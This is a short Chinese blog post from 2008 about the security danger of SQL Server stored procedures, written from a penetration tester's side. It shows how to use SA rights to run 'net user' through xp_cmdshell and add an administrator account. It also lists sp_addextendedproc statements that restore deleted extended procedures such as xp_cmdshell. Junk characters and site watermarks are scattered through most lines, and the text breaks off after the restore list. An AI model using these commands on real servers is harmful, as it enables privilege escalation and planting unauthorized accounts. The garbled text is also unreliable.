[攻防手记]SQL存储过程带来的安全危险
上一篇 /
下一篇 2008-02-29 09:23:32
看过笔者文章的读者可能知道,笔者在渗透的时候最喜欢使用一些
存储过程有些都是已知的,但是很多人并不常用,强大的SQL存储过程带来的
安全危险是不能忽视的,这里我把笔者整理的一些常用的SQL语句以及存储过程共享出来,希望能引起注意。
IXPUB技术博客`f4@^*@w:Hng 首先说一下如果我们手中有SA权限那么我们该怎么做呢? 很多朋友就会想到了执行DOS命令加一个管理员权限的用户 用SQL执行的语句就是IXPUB技术博客5t*uL:h$bF4I
IXPUB技术博客"n(h'oAM
L exec master.dbo.xp_cmdshell 'net user xx xx/add' 但是很多时候我们在使用工具的时候并不能成功的加用户,
E"i2\ LR
t[k_E{S0IXPUB技术博客@3VqQ+gsHm-B 原因可能有以下几个:IXPUB技术博客-`,G:B.dS
IXPUB技术博客iAFG:WW 1.xp_cmdshell 被删除
l{ k(R2I0 2.xp_cmdshell所使用的xplog70.dll被删除IXPUB技术博客"W)O'~
\b6Is6I
IXPUB技术博客PJx"n5H 那么如果是第一中情况的话就很简单了,我们只需要恢复存储过程就可以了。恢复存储过程的语句如下:IXPUB技术博客vfk+HUwC
IXPUB技术博客+F\(h ?!l-G ★IXPUB技术博客Ax6YSmN0\'@
use master
y%N&\$HpV/u-O0 exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
5ppt4o#NB0 exec sp_addextendedproc xp_dirtree,'xpstar.dll'
7ddDQm;Oq{0 exec sp_addextendedproc xp_enumgroups,'xplog70.dll' IXPUB技术博客 v8t#OU\-||0v?
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' IXPUB技术博客!UA9CU)L$z.z7z`
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' IXPUB技术博客+v0aQpaV%v s/u
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' IXPUB技术博客xaXc4z;P A
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'